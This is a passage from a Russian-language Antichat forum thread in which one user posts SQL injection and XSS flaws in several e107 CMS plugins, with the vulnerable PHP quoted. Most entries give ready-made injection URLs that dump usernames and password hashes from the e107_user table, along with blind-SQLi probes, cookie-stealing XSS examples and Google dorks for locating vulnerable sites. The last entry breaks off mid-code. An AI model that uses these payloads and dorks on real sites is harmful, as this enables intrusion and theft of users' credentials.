ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
13.12.2010, 17:59
|
|
Guest
Сообщений: n/a
Провел на форуме:
34733
Репутация:
83
|
|
Election v0.5
SQL Injection:
/election.php (election_class.php)
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
[/COLOR][COLOR="#0000BB"]$candidatelist[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$dao[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getCandidateList[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$election[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getId[/COLOR][COLOR="#007700"]());
...
if ([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Select[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"user"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"user_id, user_name, user_login"[/COLOR][COLOR="#007700"])) {
while ([/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Fetch[/COLOR][COLOR="#007700"]()) {
[/COLOR][COLOR="#0000BB"]$owners[/COLOR][COLOR="#007700"][] = array([/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"user_id"[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"user_name"[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]" ("[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"user_login"[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]")"[/COLOR][COLOR="#007700"]);
}
...[/COLOR][/COLOR]
Пример:
Код:
Code:
http://e107/e107_plugins/election/election.php?1.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16%20from%20e107_user--
Путь:
http://e107/e107_plugins/election/admin_menu.php
http://e107/e107_plugins/election/e_comment.php
http://e107/e107_plugins/election/e_search.php
Дорк:inurl:e107_plugins/election/
|
|
|
|
13.12.2010, 22:17
|
|
Guest
Сообщений: n/a
Провел на форуме:
34733
Репутация:
83
|
|
RSS Reader v1.10
Blind SQL Injection:
/include/getrss.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
[/COLOR][COLOR="#0000BB"]$q[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"q"[/COLOR][COLOR="#007700"]];
...
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]DB_Select[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"rss_reader"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"rss_feed_addr"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"rss_feed_id="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$q[/COLOR][COLOR="#007700"]);
...[/COLOR][/COLOR]
Пример:
Код:
Code:
http://e107/e107_plugins/rss_reader/include/getrss.php?q=2%20and%20substring(version(),1,1)=5
Путь:
http://e107/e107_plugins/rss_reader/admin_menu.php
Дорк:inurl:e107_plugins/rss_reader/
|
|
|
|
14.12.2010, 11:27
|
|
Guest
Сообщений: n/a
Провел на форуме:
34733
Репутация:
83
|
|
Yellow Pages v2.0 b1
SQL Injection:
/yellowpages.php
Пример:
Код:
Code:
http://e107/e107_plugins/yellowpages/yellowpages.php?1.-2%20union%20select%201,concat_ws(0x3a,user_name,user_password),3,4,5,6,7,8,9,10,11,12%20from%20e107_user--
Путь:
http://e107/e107_plugins/yellowpages/admin_menu.php
http://e107/e107_plugins/yellowpages/admin_prefs_90.php
http://e107/e107_plugins/yellowpages/admin_update.php
http://e107/e107_plugins/yellowpages/e_list.php
http://e107/e107_plugins/yellowpages/e_search.php
etc..
Дорк:inurl:e107_plugins/yellowpages/
|
|
|
|
14.12.2010, 12:16
|
|
Guest
Сообщений: n/a
Провел на форуме:
34733
Репутация:
83
|
|
Tutor Locator v1.1
XSS:
/tutor.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]{
[/COLOR][COLOR="#0000BB"]$pid[/COLOR][COLOR="#007700"]= (IsSet([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pid'[/COLOR][COLOR="#007700"]]) ?[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'pid'[/COLOR][COLOR="#007700"]] :[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]explode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"."[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]e_QUERY[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$tutor_from[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]intval[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$tutor_action[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"item"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$tutor_itemid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]intval[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$tmp[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]4[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$tutor_com[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]enter_comment[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'author_name'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'comment'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]"tutor"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$tutor_itemid[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$pid[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'subject'[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#FF8000"]// print $tutor_action.$tutor_itemid;
[/COLOR][COLOR="#007700"]}
[/COLOR][/COLOR]
Снизу есть форма отправки комментария, вписываем "alert('xss')" и.. любуемся.
Путь:
http://e107/e107_plugins/tutor/tutor_top_menu.php
Дорк:inurl:e107_plugins/tutor/
|
|
|
|
14.12.2010, 14:52
|
|
Guest
Сообщений: n/a
Провел на форуме:
34733
Репутация:
83
|
|
roll_mini v1.2
XSS:
/roll.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'cat'[/COLOR][COLOR="#007700"]])[/COLOR][COLOR="#0000BB"]$id_cat[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'cat'[/COLOR][COLOR="#007700"]]; else[/COLOR][COLOR="#0000BB"]$id_cat[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"1"[/COLOR][COLOR="#007700"];
[/COLOR][/COLOR]
Пример:
Код:
Code:
http://e107/e107_plugins/roll_mini/roll.php?cat=%3Cscript%3Ealert(document.cookie)%3C/script%3E
Необходимы права администратора, SQL injection:
/roll.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'cat'[/COLOR][COLOR="#007700"]])[/COLOR][COLOR="#0000BB"]$id_cat[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'cat'[/COLOR][COLOR="#007700"]]; else[/COLOR][COLOR="#0000BB"]$id_cat[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"1"[/COLOR][COLOR="#007700"];
if ([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'add'[/COLOR][COLOR="#007700"]])[/COLOR][COLOR="#0000BB"]$add[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'add'[/COLOR][COLOR="#007700"]];
if ([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'edit'[/COLOR][COLOR="#007700"]])[/COLOR][COLOR="#0000BB"]$edit[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'edit'[/COLOR][COLOR="#007700"]];
if ([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'card_id'[/COLOR][COLOR="#007700"]])[/COLOR][COLOR="#0000BB"]$card_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'card_id'[/COLOR][COLOR="#007700"]];
if ([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'index_name'[/COLOR][COLOR="#007700"]])[/COLOR][COLOR="#0000BB"]$index_name[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'index_name'[/COLOR][COLOR="#007700"]];
if ([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'search'[/COLOR][COLOR="#007700"]])[/COLOR][COLOR="#0000BB"]$search[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'search'[/COLOR][COLOR="#007700"]];
if ([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'page'[/COLOR][COLOR="#007700"]]) {[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'page'[/COLOR][COLOR="#007700"]]; } else {[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]; }
[/COLOR][/COLOR]
А дальше там обращения к БД с этими переменными. Ничего не фильтруется.
Пример:
Код:
Code:
http://e107/e107_plugins/roll_mini/roll.php?cat=%3Cscript%3Ealert(document.cookie)%3C/script%3E&card_id=-1%20union%20select%201,2,concat_ws(0x3a,user_name,user_password),4,5,6%20from%20e107_user&edit=1
Путь:
http://e107/e107_plugins/roll_mini/search.php
Дорк:inurl:e107_plugins/roll_mini/
|
|
|
|
14.12.2010, 19:07
|
|
Guest
Сообщений: n/a
Провел на форуме:
34733
Репутация:
83
|
|
Locator v1.2
Необходимы права администратора, SQL injection:
/admin_countries.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Select[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]DB_TABLE_LOCATOR_COUNTRY[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"*"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"locator_country_id="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'locator_country_id'[/COLOR][COLOR="#007700"]]);
[/COLOR][/COLOR]
Пример:
Код:
Code:
http://e107/e107_plugins/locator/admin_countries.php?edit_country=1&locator_country_id=1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3,4%20from%20e107_user--
Необходимы права администратора, SQL injection:
/admin_categories.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Select[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]DB_TABLE_LOCATOR_TABLE[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"*"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"locator_cat_id="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'locator_cat_id'[/COLOR][COLOR="#007700"]]);
[/COLOR][/COLOR]
Пример:
Код:
Code:
http://e107/e107_plugins/locator/admin_categories.php?edit_category=1&locator_cat_id=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11--
В админке ещё много чего бажного.
Дорк:inurl:e107_plugins/locator/
|
|
|
|
05.01.2011, 23:12
|
|
Guest
Сообщений: n/a
Провел на форуме:
34733
Репутация:
83
|
|
League Version 1.04
SQL injection:
/lique.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
if([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'Saison'[/COLOR][COLOR="#007700"]]){[/COLOR][COLOR="#0000BB"]$Saison[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'Saison'[/COLOR][COLOR="#007700"]];}
...
[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#DD0000"]"lique_games"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#DD0000"]"*"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#DD0000"]"games_home_id="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$pref[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lique_my_team'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]" AND games_saison_id="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$Saison[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" AND games_date"[/COLOR][COLOR="#007700"].([/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"]()-[/COLOR][COLOR="#0000BB"]604500[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]" OR games_gast_id="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$pref[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lique_my_team'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]" AND games_date"[/COLOR][COLOR="#007700"].([/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"]()-[/COLOR][COLOR="#0000BB"]604500[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]" ORDER BY games_date "[/COLOR][COLOR="#007700"];
...
[/COLOR][/COLOR]
Пример:
Код:
Code:
http://e107/e107_plugins/lique/lique.php?Saison=-2%20union%20select%201,concat_ws%280x3a,user_name,user_password%29,3,4,5%20from%20e107_user--
Blind SQL injection:
/scorer.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
if([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'Saison'[/COLOR][COLOR="#007700"]]){[/COLOR][COLOR="#0000BB"]$Saison[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'Saison'[/COLOR][COLOR="#007700"]];}else{[/COLOR][COLOR="#0000BB"]$Saison[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$pref[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lique_my_saison'[/COLOR][COLOR="#007700"]];}
if([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'team'[/COLOR][COLOR="#007700"]]){[/COLOR][COLOR="#0000BB"]$team[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'team'[/COLOR][COLOR="#007700"]];}else{[/COLOR][COLOR="#0000BB"]$team[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$pref[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lique_my_team'[/COLOR][COLOR="#007700"]];}
[/COLOR][COLOR="#0000BB"]$z[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'games'[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Select[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"lique_games"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"*"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"games_home_id="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$team[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" OR games_gast_id="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$team[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" "[/COLOR][COLOR="#007700"]);
while([/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Fetch[/COLOR][COLOR="#007700"]()){
[/COLOR][COLOR="#0000BB"]$z[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'games'[/COLOR][COLOR="#007700"]]++;
}
[/COLOR][COLOR="#0000BB"]$qry1[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"
SELECT m.*, me.* FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]MPREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"lique_liga AS m
LEFT JOIN "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]MPREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"lique_teams AS me ON me.team_id=m.liga_team_id
WHERE m.liga_id ='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$team[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"'
"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Select_gen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$qry1[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Fetch[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$team_ID[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'team_id'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$team_Name[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'team_name'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$team_admin[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'team_admin_id'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$team_url[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'team_url'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$team_icon[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'team_icon'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$team_description[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'team_description'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$z[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'players'[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Select[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"lique_roster"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"*"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"roster_team_id="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$team[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]);
while([/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Fetch[/COLOR][COLOR="#007700"]()){
[/COLOR][COLOR="#0000BB"]$z[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'players'[/COLOR][COLOR="#007700"]]++;
}
...
[/COLOR][/COLOR]
Пример:
Код:
Code:
http://e107/e107_plugins/lique/scorer.php?team=1%20and%20substring%28@@version,1,1%29=5
Blind SQL injection:
/strafen.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
if([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'Saison'[/COLOR][COLOR="#007700"]]){[/COLOR][COLOR="#0000BB"]$Saison[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'Saison'[/COLOR][COLOR="#007700"]];}else{[/COLOR][COLOR="#0000BB"]$Saison[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$pref[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lique_my_saison'[/COLOR][COLOR="#007700"]];}
if([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'team'[/COLOR][COLOR="#007700"]]){[/COLOR][COLOR="#0000BB"]$team[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'team'[/COLOR][COLOR="#007700"]];}else{[/COLOR][COLOR="#0000BB"]$team[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$pref[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lique_my_team'[/COLOR][COLOR="#007700"]];}
[/COLOR][COLOR="#0000BB"]$z[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'games'[/COLOR][COLOR="#007700"]]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Select[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"lique_games"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"*"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"games_home_id="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$team[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" OR games_gast_id="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$team[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" "[/COLOR][COLOR="#007700"]);
while([/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Fetch[/COLOR][COLOR="#007700"]()){
[/COLOR][COLOR="#0000BB"]$z[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'games'[/COLOR][COLOR="#007700"]]++;
}
[/COLOR][COLOR="#0000BB"]$qry1[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"
SELECT m.*, me.* FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]MPREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"lique_liga AS m
LEFT JOIN "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]MPREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"lique_teams AS me ON me.team_id=m.liga_team_id
WHERE m.liga_id ='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$team[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"'
"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Select_gen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$qry1[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Fetch[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$team_ID[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'team_id'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$team_Name[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'team_name'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$team_admin[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'team_admin_id'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$team_url[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'team_url'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$team_icon[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'team_icon'[/COLOR][COLOR="#007700"]];
